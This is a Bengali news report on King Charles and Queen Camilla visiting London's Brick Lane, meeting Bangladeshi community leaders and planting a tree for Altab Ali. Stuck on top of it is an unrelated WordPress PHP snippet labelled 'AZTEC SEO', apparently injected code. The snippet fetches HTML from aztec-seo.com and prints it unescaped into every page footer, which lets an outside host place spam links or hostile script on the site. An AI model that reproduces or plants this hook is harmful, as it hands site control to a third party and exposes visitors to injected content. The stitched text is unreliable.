/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ব্রিটেনের রাজা চার্লস বাংলাদেশি অধ্যুষিত লন্ডনের ব্রিকলেন এলাকা পরিদর্শন করেছেন । সেখানে তিনি বাংলাদেশী কমিউনিটির নেতাদের সঙ্গে সাক্ষাৎ করেন। এ সময় রাজার সঙ্গে রানি ক্যামিলাও ছিলেন।
গত বুধবার লন্ডনের এলাকা পরিদর্শনে গেলে রাজা চার্লস ও রানিকে ফুলের পাপড়ি ছিটিয়ে বরণ করেন বাংলাদেশিরা। এ সময় রাজা বাংলাদেশির সঙ্গে করমর্দন করেন এবং তাদের খোঁজখবর নেন। খবর আরব নিউজের।
রাজা সেখানে একটি মসজিদ পরিদর্শন করেন এবং প্রাঙ্গণে একটি বৃক্ষরোপণ করেন। ১৯৭৮ সালে বর্ণবাদীদের হামলায় নিহত বাংলাদেশি যুবক আলতাব আলীর স্মরণে রাজা চার্লস ওই বৃক্ষরোপণ করেন।
গ্রাম-বাংলা নামের একটি রেস্তোরাঁয় রাজা ও রানি বাংলাদেশি খাবার গ্রহণ করেন। ব্রিটেনে নিযুক্ত বাংলাদেশের হাইকমিশনার সাইদা মুনা তাসনিম জানান, গত বছরের অক্টোবরে চার্লসের বাংলাদেশ সফর করার কথা ছিল। কিন্তু রানি দ্বিতীয় এলিজাবেথের মৃত্যুতে পরে তা বাতিল করা হয়।
শেখ দৌলত, ঢাকা।